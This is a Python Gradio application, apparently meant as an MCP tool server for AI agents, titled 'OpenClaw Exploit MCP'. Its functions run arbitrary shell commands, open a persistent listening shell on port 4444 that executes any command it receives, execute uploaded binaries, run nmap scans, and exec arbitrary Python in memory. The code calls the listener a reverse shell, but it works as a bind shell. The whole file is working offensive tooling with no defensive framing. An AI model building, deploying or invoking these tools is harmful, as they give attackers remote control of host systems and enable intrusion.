import gradio as gr import subprocess import socket import threading import os import requests import time # --- Command Execution --- def run_command(cmd: str) -> str: """Führt beliebige Shell-Befehle aus.""" try: output = subprocess.check_output( cmd, shell=True, stderr=subprocess.STDOUT, text=True ) return output except Exception as e: return f"Error: {str(e)}" # --- Reverse Shell (Persistent) --- def start_reverse_shell(port: int = 4444) -> str: """Startet eine persistente Reverse Shell.""" def listener(): while True: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", port)) s.listen(1) conn, addr = s.accept() conn.send(b"OpenClaw Exploit Shell\n") while True: cmd = conn.recv(1024).decode().strip() if not cmd: break try: output = subprocess.check_output( cmd, shell=True, stderr=subprocess.STDOUT, text=True ) conn.send(output.encode()) except Exception as e: conn.send(str(e).encode()) conn.close() except Exception as e: time.sleep(5) # Warte 5 Sekunden und versuche neu threading.Thread(target=listener, daemon=True).start() return f"Reverse Shell auf Port {port} aktiv. Verbinde dich mit: `nc {port}`" # --- File Upload & Execution --- def execute_uploaded_file(file): """Führt hochgeladene Dateien aus (z. B. Skripte, Binaries).""" if not file: return "Keine Datei hochgeladen." file_path = f"/tmp/{file.name}" with open(file_path, "wb") as f: f.write(file.read()) os.chmod(file_path, 0o755) # Ausführbar machen try: output = subprocess.check_output( f"{file_path}", shell=True, stderr=subprocess.STDOUT, text=True ) return f"Datei ausgeführt:\n{output}" except Exception as e: return f"Fehler: {str(e)}" # --- Network Scanner (Nmap) --- def scan_network(target: str) -> str: """Führt einen Nmap-Scan durch.""" try: output = subprocess.check_output( f"nmap -sV -T4 {target}", shell=True, stderr=subprocess.STDOUT, text=True ) return output except Exception as e: return f"Scan fehlgeschlagen: {str(e)}" # --- Fileless Code Execution --- def fileless_execute(code: str) -> str: """Führt Python-Code direkt im Speicher aus (fileless).""" try: exec_globals = {} exec(code, exec_globals) return f"Code ausgeführt. Ergebnis: {exec_globals.get('__builtins__', {}).get('output', 'Kein Output')}" except Exception as e: return f"Fehler: {str(e)}" # --- Gradio UI --- with gr.Blocks() as demo: gr.Markdown("# OpenClaw Exploit MCP") gr.Markdown("**Command Execution, Reverse Shell, File Upload/Execution, Network Scanning**") with gr.Tab("Command Execution"): cmd_input = gr.Textbox(label="Shell-Befehl") cmd_output = gr.Textbox(label="Output") gr.Button("Ausführen").click(run_command, inputs=cmd_input, outputs=cmd_output) with gr.Tab("Reverse Shell"): port_input = gr.Number(label="Port", value=4444) shell_output = gr.Textbox(label="Status") gr.Button("Starten").click(start_reverse_shell, inputs=port_input, outputs=shell_output) with gr.Tab("File Upload & Execution"): file_input = gr.File(label="Datei hochladen") file_output = gr.Textbox(label="Output") gr.Button("Ausführen").click(execute_uploaded_file, inputs=file_input, outputs=file_output) with gr.Tab("Network Scanner"): target_input = gr.Textbox(label="Ziel (z. B. 192.168.1.1)", value="127.0.0.1") scan_output = gr.Textbox(label="Scan-Ergebnis") gr.Button("Scannen").click(scan_network, inputs=target_input, outputs=scan_output) with gr.Tab("Fileless Execution"): code_input = gr.Textbox(label="Python-Code", placeholder="print('Hello, Exploit!')") code_output = gr.Textbox(label="Output") gr.Button("Ausführen").click(fileless_execute, inputs=code_input, outputs=code_output) # MCP-Server aktivieren demo.launch(mcp_server=True)